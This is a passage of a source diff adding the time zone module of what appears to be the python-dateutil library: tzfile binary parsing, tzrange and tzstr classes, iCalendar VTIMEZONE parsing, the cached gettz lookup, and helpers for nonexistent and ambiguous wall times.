out.trans_list_utc = [] + + # Next come tzh_timecnt one-byte values of type unsigned + # char; each one tells which of the different types of + # ``local time'' types described in the file is associated + # with the same-indexed transition time. These values + # serve as indices into an array of ttinfo structures that + # appears next in the file. + + if timecnt: + out.trans_idx = struct.unpack(">%dB" % timecnt, + fileobj.read(timecnt)) + else: + out.trans_idx = [] + + # Each ttinfo structure is written as a four-byte value + # for tt_gmtoff of type long, in a standard byte + # order, followed by a one-byte value for tt_isdst + # and a one-byte value for tt_abbrind. In each + # structure, tt_gmtoff gives the number of + # seconds to be added to UTC, tt_isdst tells whether + # tm_isdst should be set by localtime(3), and + # tt_abbrind serves as an index into the array of + # time zone abbreviation characters that follow the + # ttinfo structure(s) in the file. 
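+        #
+        # Concretely, each record is unpacked below as ">lbb": a 4-byte
+        # signed UTC offset in seconds, a 1-byte isdst flag and a 1-byte
+        # index into the abbreviation string block that is read right after.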
+ + ttinfo = [] + + for i in range(typecnt): + ttinfo.append(struct.unpack(">lbb", fileobj.read(6))) + + abbr = fileobj.read(charcnt).decode() + + # Then there are tzh_leapcnt pairs of four-byte + # values, written in standard byte order; the + # first value of each pair gives the time (as + # returned by time(2)) at which a leap second + # occurs; the second gives the total number of + # leap seconds to be applied after the given time. + # The pairs of values are sorted in ascending order + # by time. + + # Not used, for now (but seek for correct file position) + if leapcnt: + fileobj.seek(leapcnt * 8, os.SEEK_CUR) + + # Then there are tzh_ttisstdcnt standard/wall + # indicators, each stored as a one-byte value; + # they tell whether the transition times associated + # with local time types were specified as standard + # time or wall clock time, and are used when + # a time zone file is used in handling POSIX-style + # time zone environment variables. + + if ttisstdcnt: + isstd = struct.unpack(">%db" % ttisstdcnt, + fileobj.read(ttisstdcnt)) + + # Finally, there are tzh_ttisgmtcnt UTC/local + # indicators, each stored as a one-byte value; + # they tell whether the transition times associated + # with local time types were specified as UTC or + # local time, and are used when a time zone file + # is used in handling POSIX-style time zone envi- + # ronment variables. + + if ttisgmtcnt: + isgmt = struct.unpack(">%db" % ttisgmtcnt, + fileobj.read(ttisgmtcnt)) + + # Build ttinfo list + out.ttinfo_list = [] + for i in range(typecnt): + gmtoff, isdst, abbrind = ttinfo[i] + gmtoff = _get_supported_offset(gmtoff) + tti = _ttinfo() + tti.offset = gmtoff + tti.dstoffset = datetime.timedelta(0) + tti.delta = datetime.timedelta(seconds=gmtoff) + tti.isdst = isdst + tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)] + tti.isstd = (ttisstdcnt > i and isstd[i] != 0) + tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0) + out.ttinfo_list.append(tti) + + # Replace ttinfo indexes for ttinfo objects. + out.trans_idx = [out.ttinfo_list[idx] for idx in out.trans_idx] + + # Set standard, dst, and before ttinfos. before will be + # used when a given time is before any transitions, + # and will be set to the first non-dst ttinfo, or to + # the first dst, if all of them are dst. + out.ttinfo_std = None + out.ttinfo_dst = None + out.ttinfo_before = None + if out.ttinfo_list: + if not out.trans_list_utc: + out.ttinfo_std = out.ttinfo_first = out.ttinfo_list[0] + else: + for i in range(timecnt-1, -1, -1): + tti = out.trans_idx[i] + if not out.ttinfo_std and not tti.isdst: + out.ttinfo_std = tti + elif not out.ttinfo_dst and tti.isdst: + out.ttinfo_dst = tti + + if out.ttinfo_std and out.ttinfo_dst: + break + else: + if out.ttinfo_dst and not out.ttinfo_std: + out.ttinfo_std = out.ttinfo_dst + + for tti in out.ttinfo_list: + if not tti.isdst: + out.ttinfo_before = tti + break + else: + out.ttinfo_before = out.ttinfo_list[0] + + # Now fix transition times to become relative to wall time. + # + # I'm not sure about this. In my tests, the tz source file + # is setup to wall time, and in the binary file isstd and + # isgmt are off, so it should be in wall time. OTOH, it's + # always in gmt time. Let me know if you have comments + # about this. 
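+        # The loop below walks the transitions in order: it derives each
+        # type's DST offset from the jump relative to the preceding standard
+        # offset, then shifts every UTC transition timestamp by the base
+        # (standard) offset so that trans_list ends up in local wall time.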
+ lastdst = None + lastoffset = None + lastdstoffset = None + lastbaseoffset = None + out.trans_list = [] + + for i, tti in enumerate(out.trans_idx): + offset = tti.offset + dstoffset = 0 + + if lastdst is not None: + if tti.isdst: + if not lastdst: + dstoffset = offset - lastoffset + + if not dstoffset and lastdstoffset: + dstoffset = lastdstoffset + + tti.dstoffset = datetime.timedelta(seconds=dstoffset) + lastdstoffset = dstoffset + + # If a time zone changes its base offset during a DST transition, + # then you need to adjust by the previous base offset to get the + # transition time in local time. Otherwise you use the current + # base offset. Ideally, I would have some mathematical proof of + # why this is true, but I haven't really thought about it enough. + baseoffset = offset - dstoffset + adjustment = baseoffset + if (lastbaseoffset is not None and baseoffset != lastbaseoffset + and tti.isdst != lastdst): + # The base DST has changed + adjustment = lastbaseoffset + + lastdst = tti.isdst + lastoffset = offset + lastbaseoffset = baseoffset + + out.trans_list.append(out.trans_list_utc[i] + adjustment) + + out.trans_idx = tuple(out.trans_idx) + out.trans_list = tuple(out.trans_list) + out.trans_list_utc = tuple(out.trans_list_utc) + + return out + + def _find_last_transition(self, dt, in_utc=False): + # If there's no list, there are no transitions to find + if not self._trans_list: + return None + + timestamp = _datetime_to_timestamp(dt) + + # Find where the timestamp fits in the transition list - if the + # timestamp is a transition time, it's part of the "after" period. + trans_list = self._trans_list_utc if in_utc else self._trans_list + idx = bisect.bisect_right(trans_list, timestamp) + + # We want to know when the previous transition was, so subtract off 1 + return idx - 1 + + def _get_ttinfo(self, idx): + # For no list or after the last transition, default to _ttinfo_std + if idx is None or (idx + 1) >= len(self._trans_list): + return self._ttinfo_std + + # If there is a list and the time is before it, return _ttinfo_before + if idx < 0: + return self._ttinfo_before + + return self._trans_idx[idx] + + def _find_ttinfo(self, dt): + idx = self._resolve_ambiguous_time(dt) + + return self._get_ttinfo(idx) + + def fromutc(self, dt): + """ + The ``tzfile`` implementation of :py:func:`datetime.tzinfo.fromutc`. + + :param dt: + A :py:class:`datetime.datetime` object. + + :raises TypeError: + Raised if ``dt`` is not a :py:class:`datetime.datetime` object. + + :raises ValueError: + Raised if this is called with a ``dt`` which does not have this + ``tzinfo`` attached. + + :return: + Returns a :py:class:`datetime.datetime` object representing the + wall time in ``self``'s time zone. + """ + # These isinstance checks are in datetime.tzinfo, so we'll preserve + # them, even if we don't care about duck typing. + if not isinstance(dt, datetime.datetime): + raise TypeError("fromutc() requires a datetime argument") + + if dt.tzinfo is not self: + raise ValueError("dt.tzinfo is not self") + + # First treat UTC as wall time and get the transition we're in. + idx = self._find_last_transition(dt, in_utc=True) + tti = self._get_ttinfo(idx) + + dt_out = dt + datetime.timedelta(seconds=tti.offset) + + fold = self.is_ambiguous(dt_out, idx=idx) + + return enfold(dt_out, fold=int(fold)) + + def is_ambiguous(self, dt, idx=None): + """ + Whether or not the "wall time" of a given datetime is ambiguous in this + zone. + + :param dt: + A :py:class:`datetime.datetime`, naive or time zone aware. 
+ + + :return: + Returns ``True`` if ambiguous, ``False`` otherwise. + + .. versionadded:: 2.6.0 + """ + if idx is None: + idx = self._find_last_transition(dt) + + # Calculate the difference in offsets from current to previous + timestamp = _datetime_to_timestamp(dt) + tti = self._get_ttinfo(idx) + + if idx is None or idx <= 0: + return False + + od = self._get_ttinfo(idx - 1).offset - tti.offset + tt = self._trans_list[idx] # Transition time + + return timestamp < tt + od + + def _resolve_ambiguous_time(self, dt): + idx = self._find_last_transition(dt) + + # If we have no transitions, return the index + _fold = self._fold(dt) + if idx is None or idx == 0: + return idx + + # If it's ambiguous and we're in a fold, shift to a different index. + idx_offset = int(not _fold and self.is_ambiguous(dt, idx)) + + return idx - idx_offset + + def utcoffset(self, dt): + if dt is None: + return None + + if not self._ttinfo_std: + return ZERO + + return self._find_ttinfo(dt).delta + + def dst(self, dt): + if dt is None: + return None + + if not self._ttinfo_dst: + return ZERO + + tti = self._find_ttinfo(dt) + + if not tti.isdst: + return ZERO + + # The documentation says that utcoffset()-dst() must + # be constant for every dt. + return tti.dstoffset + + @tzname_in_python2 + def tzname(self, dt): + if not self._ttinfo_std or dt is None: + return None + return self._find_ttinfo(dt).abbr + + def __eq__(self, other): + if not isinstance(other, tzfile): + return NotImplemented + return (self._trans_list == other._trans_list and + self._trans_idx == other._trans_idx and + self._ttinfo_list == other._ttinfo_list) + + __hash__ = None + + def __ne__(self, other): + return not (self == other) + + def __repr__(self): + return "%s(%s)" % (self.__class__.__name__, repr(self._filename)) + + def __reduce__(self): + return self.__reduce_ex__(None) + + def __reduce_ex__(self, protocol): + return (self.__class__, (None, self._filename), self.__dict__) + + +class tzrange(tzrangebase): + """ + The ``tzrange`` object is a time zone specified by a set of offsets and + abbreviations, equivalent to the way the ``TZ`` variable can be specified + in POSIX-like systems, but using Python delta objects to specify DST + start, end and offsets. + + :param stdabbr: + The abbreviation for standard time (e.g. ``'EST'``). + + :param stdoffset: + An integer or :class:`datetime.timedelta` object or equivalent + specifying the base offset from UTC. + + If unspecified, +00:00 is used. + + :param dstabbr: + The abbreviation for DST / "Summer" time (e.g. ``'EDT'``). + + If specified, with no other DST information, DST is assumed to occur + and the default behavior or ``dstoffset``, ``start`` and ``end`` is + used. If unspecified and no other DST information is specified, it + is assumed that this zone has no DST. + + If this is unspecified and other DST information is *is* specified, + DST occurs in the zone but the time zone abbreviation is left + unchanged. + + :param dstoffset: + A an integer or :class:`datetime.timedelta` object or equivalent + specifying the UTC offset during DST. If unspecified and any other DST + information is specified, it is assumed to be the STD offset +1 hour. + + :param start: + A :class:`relativedelta.relativedelta` object or equivalent specifying + the time and time of year that daylight savings time starts. 
To + specify, for example, that DST starts at 2AM on the 2nd Sunday in + March, pass: + + ``relativedelta(hours=2, month=3, day=1, weekday=SU(+2))`` + + If unspecified and any other DST information is specified, the default + value is 2 AM on the first Sunday in April. + + :param end: + A :class:`relativedelta.relativedelta` object or equivalent + representing the time and time of year that daylight savings time + ends, with the same specification method as in ``start``. One note is + that this should point to the first time in the *standard* zone, so if + a transition occurs at 2AM in the DST zone and the clocks are set back + 1 hour to 1AM, set the ``hours`` parameter to +1. + + + **Examples:** + + .. testsetup:: tzrange + + from dateutil.tz import tzrange, tzstr + + .. doctest:: tzrange + + >>> tzstr('EST5EDT') == tzrange("EST", -18000, "EDT") + True + + >>> from dateutil.relativedelta import * + >>> range1 = tzrange("EST", -18000, "EDT") + >>> range2 = tzrange("EST", -18000, "EDT", -14400, + ... relativedelta(hours=+2, month=4, day=1, + ... weekday=SU(+1)), + ... relativedelta(hours=+1, month=10, day=31, + ... weekday=SU(-1))) + >>> tzstr('EST5EDT') == range1 == range2 + True + + """ + def __init__(self, stdabbr, stdoffset=None, + dstabbr=None, dstoffset=None, + start=None, end=None): + + global relativedelta + from dateutil import relativedelta + + self._std_abbr = stdabbr + self._dst_abbr = dstabbr + + try: + stdoffset = stdoffset.total_seconds() + except (TypeError, AttributeError): + pass + + try: + dstoffset = dstoffset.total_seconds() + except (TypeError, AttributeError): + pass + + if stdoffset is not None: + self._std_offset = datetime.timedelta(seconds=stdoffset) + else: + self._std_offset = ZERO + + if dstoffset is not None: + self._dst_offset = datetime.timedelta(seconds=dstoffset) + elif dstabbr and stdoffset is not None: + self._dst_offset = self._std_offset + datetime.timedelta(hours=+1) + else: + self._dst_offset = ZERO + + if dstabbr and start is None: + self._start_delta = relativedelta.relativedelta( + hours=+2, month=4, day=1, weekday=relativedelta.SU(+1)) + else: + self._start_delta = start + + if dstabbr and end is None: + self._end_delta = relativedelta.relativedelta( + hours=+1, month=10, day=31, weekday=relativedelta.SU(-1)) + else: + self._end_delta = end + + self._dst_base_offset_ = self._dst_offset - self._std_offset + self.hasdst = bool(self._start_delta) + + def transitions(self, year): + """ + For a given year, get the DST on and off transition times, expressed + always on the standard time side. For zones with no transitions, this + function returns ``None``. + + :param year: + The year whose transitions you would like to query. + + :return: + Returns a :class:`tuple` of :class:`datetime.datetime` objects, + ``(dston, dstoff)`` for zones with an annual DST transition, or + ``None`` for fixed offset zones. 
+ """ + if not self.hasdst: + return None + + base_year = datetime.datetime(year, 1, 1) + + start = base_year + self._start_delta + end = base_year + self._end_delta + + return (start, end) + + def __eq__(self, other): + if not isinstance(other, tzrange): + return NotImplemented + + return (self._std_abbr == other._std_abbr and + self._dst_abbr == other._dst_abbr and + self._std_offset == other._std_offset and + self._dst_offset == other._dst_offset and + self._start_delta == other._start_delta and + self._end_delta == other._end_delta) + + @property + def _dst_base_offset(self): + return self._dst_base_offset_ + + +@six.add_metaclass(_TzStrFactory) +class tzstr(tzrange): + """ + ``tzstr`` objects are time zone objects specified by a time-zone string as + it would be passed to a ``TZ`` variable on POSIX-style systems (see + the `GNU C Library: TZ Variable`_ for more details). + + There is one notable exception, which is that POSIX-style time zones use an + inverted offset format, so normally ``GMT+3`` would be parsed as an offset + 3 hours *behind* GMT. The ``tzstr`` time zone object will parse this as an + offset 3 hours *ahead* of GMT. If you would like to maintain the POSIX + behavior, pass a ``True`` value to ``posix_offset``. + + The :class:`tzrange` object provides the same functionality, but is + specified using :class:`relativedelta.relativedelta` objects. rather than + strings. + + :param s: + A time zone string in ``TZ`` variable format. This can be a + :class:`bytes` (2.x: :class:`str`), :class:`str` (2.x: + :class:`unicode`) or a stream emitting unicode characters + (e.g. :class:`StringIO`). + + :param posix_offset: + Optional. If set to ``True``, interpret strings such as ``GMT+3`` or + ``UTC+3`` as being 3 hours *behind* UTC rather than ahead, per the + POSIX standard. + + .. caution:: + + Prior to version 2.7.0, this function also supported time zones + in the format: + + * ``EST5EDT,4,0,6,7200,10,0,26,7200,3600`` + * ``EST5EDT,4,1,0,7200,10,-1,0,7200,3600`` + + This format is non-standard and has been deprecated; this function + will raise a :class:`DeprecatedTZFormatWarning` until + support is removed in a future version. + + .. _`GNU C Library: TZ Variable`: + https://www.gnu.org/software/libc/manual/html_node/TZ-Variable.html + """ + def __init__(self, s, posix_offset=False): + global parser + from dateutil.parser import _parser as parser + + self._s = s + + res = parser._parsetz(s) + if res is None or res.any_unused_tokens: + raise ValueError("unknown string format") + + # Here we break the compatibility with the TZ variable handling. + # GMT-3 actually *means* the timezone -3. + if res.stdabbr in ("GMT", "UTC") and not posix_offset: + res.stdoffset *= -1 + + # We must initialize it first, since _delta() needs + # _std_offset and _dst_offset set. Use False in start/end + # to avoid building it two times. 
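+        # Passing start=False/end=False here suppresses tzrange's default
+        # DST rules; the actual rules are rebuilt from the parsed string
+        # via _delta() just below.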
+ tzrange.__init__(self, res.stdabbr, res.stdoffset, + res.dstabbr, res.dstoffset, + start=False, end=False) + + if not res.dstabbr: + self._start_delta = None + self._end_delta = None + else: + self._start_delta = self._delta(res.start) + if self._start_delta: + self._end_delta = self._delta(res.end, isend=1) + + self.hasdst = bool(self._start_delta) + + def _delta(self, x, isend=0): + from dateutil import relativedelta + kwargs = {} + if x.month is not None: + kwargs["month"] = x.month + if x.weekday is not None: + kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week) + if x.week > 0: + kwargs["day"] = 1 + else: + kwargs["day"] = 31 + elif x.day: + kwargs["day"] = x.day + elif x.yday is not None: + kwargs["yearday"] = x.yday + elif x.jyday is not None: + kwargs["nlyearday"] = x.jyday + if not kwargs: + # Default is to start on first sunday of april, and end + # on last sunday of october. + if not isend: + kwargs["month"] = 4 + kwargs["day"] = 1 + kwargs["weekday"] = relativedelta.SU(+1) + else: + kwargs["month"] = 10 + kwargs["day"] = 31 + kwargs["weekday"] = relativedelta.SU(-1) + if x.time is not None: + kwargs["seconds"] = x.time + else: + # Default is 2AM. + kwargs["seconds"] = 7200 + if isend: + # Convert to standard time, to follow the documented way + # of working with the extra hour. See the documentation + # of the tzinfo class. + delta = self._dst_offset - self._std_offset + kwargs["seconds"] -= delta.seconds + delta.days * 86400 + return relativedelta.relativedelta(**kwargs) + + def __repr__(self): + return "%s(%s)" % (self.__class__.__name__, repr(self._s)) + + +class _tzicalvtzcomp(object): + def __init__(self, tzoffsetfrom, tzoffsetto, isdst, + tzname=None, rrule=None): + self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom) + self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto) + self.tzoffsetdiff = self.tzoffsetto - self.tzoffsetfrom + self.isdst = isdst + self.tzname = tzname + self.rrule = rrule + + +class _tzicalvtz(_tzinfo): + def __init__(self, tzid, comps=[]): + super(_tzicalvtz, self).__init__() + + self._tzid = tzid + self._comps = comps + self._cachedate = [] + self._cachecomp = [] + self._cache_lock = _thread.allocate_lock() + + def _find_comp(self, dt): + if len(self._comps) == 1: + return self._comps[0] + + dt = dt.replace(tzinfo=None) + + try: + with self._cache_lock: + return self._cachecomp[self._cachedate.index( + (dt, self._fold(dt)))] + except ValueError: + pass + + lastcompdt = None + lastcomp = None + + for comp in self._comps: + compdt = self._find_compdt(comp, dt) + + if compdt and (not lastcompdt or lastcompdt < compdt): + lastcompdt = compdt + lastcomp = comp + + if not lastcomp: + # RFC says nothing about what to do when a given + # time is before the first onset date. We'll look for the + # first standard component, or the first component, if + # none is found. 
+            for comp in self._comps:
+                if not comp.isdst:
+                    lastcomp = comp
+                    break
+            else:
+                lastcomp = comp[0]
+
+        with self._cache_lock:
+            self._cachedate.insert(0, (dt, self._fold(dt)))
+            self._cachecomp.insert(0, lastcomp)
+
+            if len(self._cachedate) > 10:
+                self._cachedate.pop()
+                self._cachecomp.pop()
+
+        return lastcomp
+
+    def _find_compdt(self, comp, dt):
+        if comp.tzoffsetdiff < ZERO and self._fold(dt):
+            dt -= comp.tzoffsetdiff
+
+        compdt = comp.rrule.before(dt, inc=True)
+
+        return compdt
+
+    def utcoffset(self, dt):
+        if dt is None:
+            return None
+
+        return self._find_comp(dt).tzoffsetto
+
+    def dst(self, dt):
+        comp = self._find_comp(dt)
+        if comp.isdst:
+            return comp.tzoffsetdiff
+        else:
+            return ZERO
+
+    @tzname_in_python2
+    def tzname(self, dt):
+        return self._find_comp(dt).tzname
+
+    def __repr__(self):
+        return "<tzicalvtz %s>" % repr(self._tzid)
+
+    __reduce__ = object.__reduce__
+
+
+class tzical(object):
+    """
+    This object is designed to parse an iCalendar-style ``VTIMEZONE`` structure
+    as set out in `RFC 5545`_ Section 4.6.5 into one or more `tzinfo` objects.
+
+    :param `fileobj`:
+        A file or stream in iCalendar format, which should be UTF-8 encoded
+        with CRLF endings.
+
+    .. _`RFC 5545`: https://tools.ietf.org/html/rfc5545
+    """
+    def __init__(self, fileobj):
+        global rrule
+        from dateutil import rrule
+
+        if isinstance(fileobj, string_types):
+            self._s = fileobj
+            # ical should be encoded in UTF-8 with CRLF
+            fileobj = open(fileobj, 'r')
+        else:
+            self._s = getattr(fileobj, 'name', repr(fileobj))
+            fileobj = _nullcontext(fileobj)
+
+        self._vtz = {}
+
+        with fileobj as fobj:
+            self._parse_rfc(fobj.read())
+
+    def keys(self):
+        """
+        Retrieves the available time zones as a list.
+        """
+        return list(self._vtz.keys())
+
+    def get(self, tzid=None):
+        """
+        Retrieve a :py:class:`datetime.tzinfo` object by its ``tzid``.
+
+        :param tzid:
+            If there is exactly one time zone available, omitting ``tzid``
+            or passing :py:const:`None` value returns it. Otherwise a valid
+            key (which can be retrieved from :func:`keys`) is required.
+
+        :raises ValueError:
+            Raised if ``tzid`` is not specified but there are either more
+            or fewer than 1 zone defined.
+
+        :returns:
+            Returns either a :py:class:`datetime.tzinfo` object representing
+            the relevant time zone or :py:const:`None` if the ``tzid`` was
+            not found.
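+
+        An illustrative sketch, assuming a hypothetical ``example.ics`` file
+        that defines exactly one ``VTIMEZONE`` block:
+
+        .. code-block:: python3
+
+            >>> from dateutil.tz import tzical
+            >>> ical = tzical('example.ics')
+            >>> ical.keys()           # hypothetical TZID
+            ['Example/Zone']
+            >>> tz = ical.get()       # allowed: exactly one zone is defined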
+        """
+        if tzid is None:
+            if len(self._vtz) == 0:
+                raise ValueError("no timezones defined")
+            elif len(self._vtz) > 1:
+                raise ValueError("more than one timezone available")
+            tzid = next(iter(self._vtz))
+
+        return self._vtz.get(tzid)
+
+    def _parse_offset(self, s):
+        s = s.strip()
+        if not s:
+            raise ValueError("empty offset")
+        if s[0] in ('+', '-'):
+            signal = (-1, +1)[s[0] == '+']
+            s = s[1:]
+        else:
+            signal = +1
+        if len(s) == 4:
+            return (int(s[:2]) * 3600 + int(s[2:]) * 60) * signal
+        elif len(s) == 6:
+            return (int(s[:2]) * 3600 + int(s[2:4]) * 60 + int(s[4:])) * signal
+        else:
+            raise ValueError("invalid offset: " + s)
+
+    def _parse_rfc(self, s):
+        lines = s.splitlines()
+        if not lines:
+            raise ValueError("empty string")
+
+        # Unfold
+        i = 0
+        while i < len(lines):
+            line = lines[i].rstrip()
+            if not line:
+                del lines[i]
+            elif i > 0 and line[0] == " ":
+                lines[i-1] += line[1:]
+                del lines[i]
+            else:
+                i += 1
+
+        tzid = None
+        comps = []
+        invtz = False
+        comptype = None
+        for line in lines:
+            if not line:
+                continue
+            name, value = line.split(':', 1)
+            parms = name.split(';')
+            if not parms:
+                raise ValueError("empty property name")
+            name = parms[0].upper()
+            parms = parms[1:]
+            if invtz:
+                if name == "BEGIN":
+                    if value in ("STANDARD", "DAYLIGHT"):
+                        # Process component
+                        pass
+                    else:
+                        raise ValueError("unknown component: "+value)
+                    comptype = value
+                    founddtstart = False
+                    tzoffsetfrom = None
+                    tzoffsetto = None
+                    rrulelines = []
+                    tzname = None
+                elif name == "END":
+                    if value == "VTIMEZONE":
+                        if comptype:
+                            raise ValueError("component not closed: "+comptype)
+                        if not tzid:
+                            raise ValueError("mandatory TZID not found")
+                        if not comps:
+                            raise ValueError(
+                                "at least one component is needed")
+                        # Process vtimezone
+                        self._vtz[tzid] = _tzicalvtz(tzid, comps)
+                        invtz = False
+                    elif value == comptype:
+                        if not founddtstart:
+                            raise ValueError("mandatory DTSTART not found")
+                        if tzoffsetfrom is None:
+                            raise ValueError(
+                                "mandatory TZOFFSETFROM not found")
+                        if tzoffsetto is None:
+                            raise ValueError(
+                                "mandatory TZOFFSETTO not found")
+                        # Process component
+                        rr = None
+                        if rrulelines:
+                            rr = rrule.rrulestr("\n".join(rrulelines),
+                                                compatible=True,
+                                                ignoretz=True,
+                                                cache=True)
+                        comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
+                                              (comptype == "DAYLIGHT"),
+                                              tzname, rr)
+                        comps.append(comp)
+                        comptype = None
+                    else:
+                        raise ValueError("invalid component end: "+value)
+                elif comptype:
+                    if name == "DTSTART":
+                        # DTSTART in VTIMEZONE takes a subset of valid RRULE
+                        # values under RFC 5545.
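+                        # Only the default VALUE=DATE-TIME parameter is
+                        # accepted; any other DTSTART parameter is rejected
+                        # in the loop below.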
+ for parm in parms: + if parm != 'VALUE=DATE-TIME': + msg = ('Unsupported DTSTART param in ' + + 'VTIMEZONE: ' + parm) + raise ValueError(msg) + rrulelines.append(line) + founddtstart = True + elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"): + rrulelines.append(line) + elif name == "TZOFFSETFROM": + if parms: + raise ValueError( + "unsupported %s parm: %s " % (name, parms[0])) + tzoffsetfrom = self._parse_offset(value) + elif name == "TZOFFSETTO": + if parms: + raise ValueError( + "unsupported TZOFFSETTO parm: "+parms[0]) + tzoffsetto = self._parse_offset(value) + elif name == "TZNAME": + if parms: + raise ValueError( + "unsupported TZNAME parm: "+parms[0]) + tzname = value + elif name == "COMMENT": + pass + else: + raise ValueError("unsupported property: "+name) + else: + if name == "TZID": + if parms: + raise ValueError( + "unsupported TZID parm: "+parms[0]) + tzid = value + elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"): + pass + else: + raise ValueError("unsupported property: "+name) + elif name == "BEGIN" and value == "VTIMEZONE": + tzid = None + comps = [] + invtz = True + + def __repr__(self): + return "%s(%s)" % (self.__class__.__name__, repr(self._s)) + + +if sys.platform != "win32": + TZFILES = ["/etc/localtime", "localtime"] + TZPATHS = ["/usr/share/zoneinfo", + "/usr/lib/zoneinfo", + "/usr/share/lib/zoneinfo", + "/etc/zoneinfo"] +else: + TZFILES = [] + TZPATHS = [] + + +def __get_gettz(): + tzlocal_classes = (tzlocal,) + if tzwinlocal is not None: + tzlocal_classes += (tzwinlocal,) + + class GettzFunc(object): + """ + Retrieve a time zone object from a string representation + + This function is intended to retrieve the :py:class:`tzinfo` subclass + that best represents the time zone that would be used if a POSIX + `TZ variable`_ were set to the same value. + + If no argument or an empty string is passed to ``gettz``, local time + is returned: + + .. code-block:: python3 + + >>> gettz() + tzfile('/etc/localtime') + + This function is also the preferred way to map IANA tz database keys + to :class:`tzfile` objects: + + .. code-block:: python3 + + >>> gettz('Pacific/Kiritimati') + tzfile('/usr/share/zoneinfo/Pacific/Kiritimati') + + On Windows, the standard is extended to include the Windows-specific + zone names provided by the operating system: + + .. code-block:: python3 + + >>> gettz('Egypt Standard Time') + tzwin('Egypt Standard Time') + + Passing a GNU ``TZ`` style string time zone specification returns a + :class:`tzstr` object: + + .. code-block:: python3 + + >>> gettz('AEST-10AEDT-11,M10.1.0/2,M4.1.0/3') + tzstr('AEST-10AEDT-11,M10.1.0/2,M4.1.0/3') + + :param name: + A time zone name (IANA, or, on Windows, Windows keys), location of + a ``tzfile(5)`` zoneinfo file or ``TZ`` variable style time zone + specifier. An empty string, no argument or ``None`` is interpreted + as local time. + + :return: + Returns an instance of one of ``dateutil``'s :py:class:`tzinfo` + subclasses. + + .. versionchanged:: 2.7.0 + + After version 2.7.0, any two calls to ``gettz`` using the same + input strings will return the same object: + + .. code-block:: python3 + + >>> tz.gettz('America/Chicago') is tz.gettz('America/Chicago') + True + + In addition to improving performance, this ensures that + `"same zone" semantics`_ are used for datetimes in the same zone. + + + .. _`TZ variable`: + https://www.gnu.org/software/libc/manual/html_node/TZ-Variable.html + + .. 
_`"same zone" semantics`: + https://blog.ganssle.io/articles/2018/02/aware-datetime-arithmetic.html + """ + def __init__(self): + + self.__instances = weakref.WeakValueDictionary() + self.__strong_cache_size = 8 + self.__strong_cache = OrderedDict() + self._cache_lock = _thread.allocate_lock() + + def __call__(self, name=None): + with self._cache_lock: + rv = self.__instances.get(name, None) + + if rv is None: + rv = self.nocache(name=name) + if not (name is None + or isinstance(rv, tzlocal_classes) + or rv is None): + # tzlocal is slightly more complicated than the other + # time zone providers because it depends on environment + # at construction time, so don't cache that. + # + # We also cannot store weak references to None, so we + # will also not store that. + self.__instances[name] = rv + else: + # No need for strong caching, return immediately + return rv + + self.__strong_cache[name] = self.__strong_cache.pop(name, rv) + + if len(self.__strong_cache) > self.__strong_cache_size: + self.__strong_cache.popitem(last=False) + + return rv + + def set_cache_size(self, size): + with self._cache_lock: + self.__strong_cache_size = size + while len(self.__strong_cache) > size: + self.__strong_cache.popitem(last=False) + + def cache_clear(self): + with self._cache_lock: + self.__instances = weakref.WeakValueDictionary() + self.__strong_cache.clear() + + @staticmethod + def nocache(name=None): + """A non-cached version of gettz""" + tz = None + if not name: + try: + name = os.environ["TZ"] + except KeyError: + pass + if name is None or name in ("", ":"): + for filepath in TZFILES: + if not os.path.isabs(filepath): + filename = filepath + for path in TZPATHS: + filepath = os.path.join(path, filename) + if os.path.isfile(filepath): + break + else: + continue + if os.path.isfile(filepath): + try: + tz = tzfile(filepath) + break + except (IOError, OSError, ValueError): + pass + else: + tz = tzlocal() + else: + try: + if name.startswith(":"): + name = name[1:] + except TypeError as e: + if isinstance(name, bytes): + new_msg = "gettz argument should be str, not bytes" + six.raise_from(TypeError(new_msg), e) + else: + raise + if os.path.isabs(name): + if os.path.isfile(name): + tz = tzfile(name) + else: + tz = None + else: + for path in TZPATHS: + filepath = os.path.join(path, name) + if not os.path.isfile(filepath): + filepath = filepath.replace(' ', '_') + if not os.path.isfile(filepath): + continue + try: + tz = tzfile(filepath) + break + except (IOError, OSError, ValueError): + pass + else: + tz = None + if tzwin is not None: + try: + tz = tzwin(name) + except (WindowsError, UnicodeEncodeError): + # UnicodeEncodeError is for Python 2.7 compat + tz = None + + if not tz: + from dateutil.zoneinfo import get_zonefile_instance + tz = get_zonefile_instance().get(name) + + if not tz: + for c in name: + # name is not a tzstr unless it has at least + # one offset. For short values of "name", an + # explicit for loop seems to be the fastest way + # To determine if a string contains a digit + if c in "0123456789": + try: + tz = tzstr(name) + except ValueError: + pass + break + else: + if name in ("GMT", "UTC"): + tz = UTC + elif name in time.tzname: + tz = tzlocal() + return tz + + return GettzFunc() + + +gettz = __get_gettz() +del __get_gettz + + +def datetime_exists(dt, tz=None): + """ + Given a datetime and a time zone, determine whether or not a given datetime + would fall in a gap. + + :param dt: + A :class:`datetime.datetime` (whose time zone will be ignored if ``tz`` + is provided.) 
+ + :param tz: + A :class:`datetime.tzinfo` with support for the ``fold`` attribute. If + ``None`` or not provided, the datetime's own time zone will be used. + + :return: + Returns a boolean value whether or not the "wall time" exists in + ``tz``. + + .. versionadded:: 2.7.0 + """ + if tz is None: + if dt.tzinfo is None: + raise ValueError('Datetime is naive and no time zone provided.') + tz = dt.tzinfo + + dt = dt.replace(tzinfo=None) + + # This is essentially a test of whether or not the datetime can survive + # a round trip to UTC. + dt_rt = dt.replace(tzinfo=tz).astimezone(UTC).astimezone(tz) + dt_rt = dt_rt.replace(tzinfo=None) + + return dt == dt_rt + + +def datetime_ambiguous(dt, tz=None): + """ + Given a datetime and a time zone, determine whether or not a given datetime + is ambiguous (i.e if there are two times differentiated only by their DST + status). + + :param dt: + A :class:`datetime.datetime` (whose time zone will be ignored if ``tz`` + is provided.) + + :param tz: + A :class:`datetime.tzinfo` with support for the ``fold`` attribute. If + ``None`` or not provided, the datetime's own time zone will be used. + + :return: + Returns a boolean value whether or not the "wall time" is ambiguous in + ``tz``. + + .. versionadded:: 2.6.0 + """ + if tz is None: + if dt.tzinfo is None: + raise ValueError('Datetime is naive and no time zone provided.') + + tz = 